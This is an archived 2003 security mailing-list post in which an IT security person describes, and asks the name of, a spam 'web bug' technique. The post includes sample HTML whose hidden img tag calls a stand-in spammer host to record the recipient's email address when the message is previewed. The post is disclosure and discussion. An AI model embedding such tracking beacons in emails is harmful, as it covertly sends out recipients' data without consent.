Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



WebApp Sec: spam technique name?

spam technique name?

From: Calderon, Juan C (CORP, DDEMESIS) <Juan.Calderon_at_ddemesis.ge.com>
Date: Tue, 22 Apr 2003 12:06:16 -0400

Hello all

Recently I was thinking about a technique that could be used by spammers, I don't know a common name or something for such a technique, so if you know it please let me know.

PROBLEM
        How can a spammer know if the victim opened the mail?, one is the well known "Remove Me" link which, in fact, will confirm user read the message (and probably will be bombed with many more, now that he said "hey!, I'm here"). However, it requires user interaction.

SOLUTION
        A simple "solution" can be to insert a Image, Link (for CSS for example) or Script tag in the HTML mail, all those elements indicate Web browsers to send a GET request using the SRC or HREF attribute, without user interaction.

Sample Code (Mail sent to ficticious peter_at_foomail.com)
<HTML>
<BODY>
        Dear Peter<br>
        Buy our brand new product, CHEAP, CHEAP, CHEAP....
        <img src='http://www.spamer.com/AutoRecordAddress.php?email=peter%40foomail%2Ecom'><br>
        Click <a href='http://www.spamer.com/ConfirmVictim.php'>Here</a> to be removed<br>
        NOTE:the presence of this link indicates this is not spamming even if you don't ask for this email
</BODY>
</HTML>

Viewing (or "previewing" in Outlook or similar) this email will automatically send a request for a "image" file served by a Server-side script, first recording the data without explicit authorization.

I've tested this (using 3 different tags) using Exchange and some others public accounts. I have succeed in all cases.

So have you seen something similar? do you think this is a kind of XSS? I do.

cheers :)
________________________________________
Juan C Calderon
IT Security
Received on Apr 22 2003

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos